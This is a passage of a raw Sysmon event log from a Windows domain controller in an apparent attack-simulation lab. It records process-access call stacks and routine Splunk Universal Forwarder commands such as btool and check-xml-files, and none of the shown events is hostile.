:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008391Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.593{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008390Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:57.593{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008389Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.593{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008388Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:57.593{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-64F1-6064-F600-00000000AE01}6968C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008387Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.593{266CAFBE-64ED-6064-D500-00000000AE01}56486600C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64F1-6064-F600-00000000AE01}6968C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+edcb8|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+eef54|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ebd46|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008386Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.596{266CAFBE-64F1-6064-F600-00000000AE01}6968C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal check-xml-files --answer-yes --no-prompt 2>&1C:\Windows\system32\NT 
AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000008385Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.593{266CAFBE-64ED-6064-D500-00000000AE01}5648NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\splunk\pre-flight-checksMD5=52414E13BC571139A78F09588A1364A4,SHA256=3C1F79227940F5C563684E97F96860594D7E76089653064CB910620CB735929B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000008384Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.562{266CAFBE-64F1-6064-F500-00000000AE01}68686880C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008383Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.297{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64F1-6064-F500-00000000AE01}6868C:\Program 
Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008382Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.297{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008381Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:57.297{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008380Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.297{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-64F1-6064-F500-00000000AE01}6868C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008379Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:57.297{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008378Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.297{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008377Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.297{266CAFBE-64F1-6064-F400-00000000AE01}68886804C:\Program 
Files\SplunkUniversalForwarder\bin\btool.exe{266CAFBE-64F1-6064-F500-00000000AE01}6868C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008376Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.306{266CAFBE-64F1-6064-F500-00000000AE01}6868C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{266CAFBE-64F1-6064-F400-00000000AE01}6888C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list general --no-log 10341000x80000000000000008375Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.297{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64F1-6064-F400-00000000AE01}6888C:\Program 
Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008374Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.297{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008373Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:57.297{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008372Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.297{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008371Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:57.297{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008370Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.297{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-64F1-6064-F400-00000000AE01}6888C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008369Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.297{266CAFBE-64F1-6064-F300-00000000AE01}67286724C:\Windows\system32\cmd.exe{266CAFBE-64F1-6064-F400-00000000AE01}6888C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
154100x80000000000000008368Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.299{266CAFBE-64F1-6064-F400-00000000AE01}6888C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{266CAFBE-64F1-6064-F300-00000000AE01}6728C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list general --no-log 10341000x80000000000000008367Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.281{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64F1-6064-F300-00000000AE01}6728C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008366Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:57.281{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008365Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.281{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008364Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:57.281{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008363Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.281{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008362Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:57.281{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-64F1-6064-F300-00000000AE01}6728C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008361Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.281{266CAFBE-64EF-6064-E600-00000000AE01}64366356C:\Program 